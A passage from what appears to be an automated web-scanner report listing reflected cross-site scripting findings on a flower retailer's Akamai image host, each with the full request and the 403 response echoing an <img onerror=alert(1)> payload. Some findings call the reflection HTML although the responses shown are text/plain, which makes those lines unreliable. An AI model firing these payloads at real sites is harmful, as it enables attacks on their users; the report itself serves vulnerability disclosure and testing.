Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:01 GMT
Connection: close

Unable to find /ProvideCommerce/MBQnewspringdays_grn10_3_PFcb531<img src=a onerror=alert(1)>8866ce5e065

4.61. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpinksapp_pnk11_catalog_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpinksapp_pnk11_catalog_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the 403 response. The payload ade22<img%20src%3da%20onerror%3dalert(1)>04c4d155f7 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as ade22<img src=a onerror=alert(1)>04c4d155f7 in the application's response.

The proof-of-concept uses an <img> error handler to introduce JavaScript into the response. The response, however, is served with Content-Type: text/plain and without an X-Content-Type-Options: nosniff header: a browser that honours the declared type renders the body as text and the handler never runs, so the injection fires only in a client that sniffs the body as HTML. Encoding or dropping the echoed path, and adding nosniff, closes it either way.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpinksapp_pnk11_catalog_PFade22<img%20src%3da%20onerror%3dalert(1)>04c4d155f7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:52 GMT
Connection: close

Unable to find /ProvideCommerce/MBQpinksapp_pnk11_catalog_PFade22<img src=a onerror=alert(1)>04c4d155f7

4.62. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PF

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the 403 response. The payload b8d1e<img%20src%3da%20onerror%3dalert(1)>b9b63706081 was submitted in the REST URL parameter 9 and was echoed, URL-decoded, as b8d1e<img src=a onerror=alert(1)>b9b63706081 in the application's response.

The proof-of-concept uses an <img> error handler to introduce JavaScript into the response. The response, however, is served with Content-Type: text/plain and without an X-Content-Type-Options: nosniff header: a browser that honours the declared type renders the body as text and the handler never runs, so the injection fires only in a client that sniffs the body as HTML. Encoding or dropping the echoed path, and adding nosniff, closes it either way.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PFb8d1e<img%20src%3da%20onerror%3dalert(1)>b9b63706081?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:56 GMT
Connection: close

Unable to find /ProvideCommerce/MBQpurelyspec_grn10_PFb8d1e<img src=a onerror=alert(1)>b9b63706081

4.63. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f576b<img%20src%3da%20onerror%3dalert(1)>318adb917f4 was submitted in the REST URL parameter 9. This input was echoed as f576b<img src=a onerror=alert(1)>318adb917f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PFf576b<img%20src%3da%20onerror%3dalert(1)>318adb917f4?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:56 GMT
Connection: close

Unable to find /ProvideCommerce/MBQpurppetals11_PFf576b<img src=a onerror=alert(1)>318adb917f4

4.64. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 14c82<img%20src%3da%20onerror%3dalert(1)>a650ceee263 was submitted in the REST URL parameter 9. This input was echoed as 14c82<img src=a onerror=alert(1)>a650ceee263 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF14c82<img%20src%3da%20onerror%3dalert(1)>a650ceee263?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=120&hei=140 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:50 GMT
Connection: close

Unable to find /ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF14c82<img src=a onerror=alert(1)>a650ceee263

4.65. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringcarnspoms11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringcarnspoms11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload eb360<img%20src%3da%20onerror%3dalert(1)>050e392a88c was submitted in the REST URL parameter 9. This input was echoed as eb360<img src=a onerror=alert(1)>050e392a88c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringcarnspoms11_PFeb360<img%20src%3da%20onerror%3dalert(1)>050e392a88c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:46 GMT
Connection: close

Unable to find /ProvideCommerce/MBQspringcarnspoms11_PFeb360<img src=a onerror=alert(1)>050e392a88c

4.66. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f398f<img%20src%3da%20onerror%3dalert(1)>7798ed45d96 was submitted in the REST URL parameter 9. This input was echoed as f398f<img src=a onerror=alert(1)>7798ed45d96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PFf398f<img%20src%3da%20onerror%3dalert(1)>7798ed45d96?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:13 GMT
Connection: close

Unable to find /ProvideCommerce/MBQspringmix11_PFf398f<img src=a onerror=alert(1)>7798ed45d96

4.67. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c3445<img%20src%3da%20onerror%3dalert(1)>a12c7cc1173 was submitted in the REST URL parameter 9. This input was echoed as c3445<img src=a onerror=alert(1)>a12c7cc1173 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PFc3445<img%20src%3da%20onerror%3dalert(1)>a12c7cc1173?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:57 GMT
Connection: close

Unable to find /ProvideCommerce/MBQsprngawake09_PFc3445<img src=a onerror=alert(1)>a12c7cc1173

4.68. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b01c9<img%20src%3da%20onerror%3dalert(1)>1b6363653ca was submitted in the REST URL parameter 9. This input was echoed as b01c9<img src=a onerror=alert(1)>1b6363653ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PFb01c9<img%20src%3da%20onerror%3dalert(1)>1b6363653ca?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:42 GMT
Connection: close

Unable to find /ProvideCommerce/MBQtruspec_pnk10_3_PFb01c9<img src=a onerror=alert(1)>1b6363653ca

4.69. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c1d42<img%20src%3da%20onerror%3dalert(1)>8f4a450e5b3 was submitted in the REST URL parameter 9. This input was echoed as c1d42<img src=a onerror=alert(1)>8f4a450e5b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQc1d42<img%20src%3da%20onerror%3dalert(1)>8f4a450e5b3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:14 GMT
Connection: close

Unable to find /ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQc1d42<img src=a onerror=alert(1)>8f4a450e5b3

4.70. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload afe11<img%20src%3da%20onerror%3dalert(1)>38946d8b0c2 was submitted in the REST URL parameter 9. This input was echoed as afe11<img src=a onerror=alert(1)>38946d8b0c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQafe11<img%20src%3da%20onerror%3dalert(1)>38946d8b0c2?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:11 GMT
Connection: close

Unable to find /ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQafe11<img src=a onerror=alert(1)>38946d8b0c2

4.71. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_AC [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_AC

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e5c08<img%20src%3da%20onerror%3dalert(1)>f66d8f8ae36 was submitted in the REST URL parameter 9. This input was echoed as e5c08<img src=a onerror=alert(1)>f66d8f8ae36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_ACe5c08<img%20src%3da%20onerror%3dalert(1)>f66d8f8ae36?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:12:34 GMT
Connection: close

Unable to find /ProvideCommerce/Mdaycard10_ACe5c08<img src=a onerror=alert(1)>f66d8f8ae36

4.72. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7e221<img%20src%3da%20onerror%3dalert(1)>fb7298d04e was submitted in the REST URL parameter 9. This input was echoed as 7e221<img src=a onerror=alert(1)>fb7298d04e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ7e221<img%20src%3da%20onerror%3dalert(1)>fb7298d04e?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:13 GMT
Connection: close

Unable to find /ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ7e221<img src=a onerror=alert(1)>fb7298d04e

4.73. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2e51a<img%20src%3da%20onerror%3dalert(1)>f85c7e7ee4 was submitted in the REST URL parameter 9. This input was echoed as 2e51a<img src=a onerror=alert(1)>f85c7e7ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF2e51a<img%20src%3da%20onerror%3dalert(1)>f85c7e7ee4?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 112
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:58 GMT
Connection: close

Unable to find /ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF2e51a<img src=a onerror=alert(1)>f85c7e7ee4

4.74. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3eff6<img%20src%3da%20onerror%3dalert(1)>448fbcc17a4 was submitted in the REST URL parameter 9. This input was echoed as 3eff6<img src=a onerror=alert(1)>448fbcc17a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ3eff6<img%20src%3da%20onerror%3dalert(1)>448fbcc17a4?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:29 GMT
Connection: close

Unable to find /ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ3eff6<img src=a onerror=alert(1)>448fbcc17a4

4.75. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 54ec7<img%20src%3da%20onerror%3dalert(1)>fe758beee42 was submitted in the REST URL parameter 9. This input was echoed as 54ec7<img src=a onerror=alert(1)>fe758beee42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF54ec7<img%20src%3da%20onerror%3dalert(1)>fe758beee42?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 116
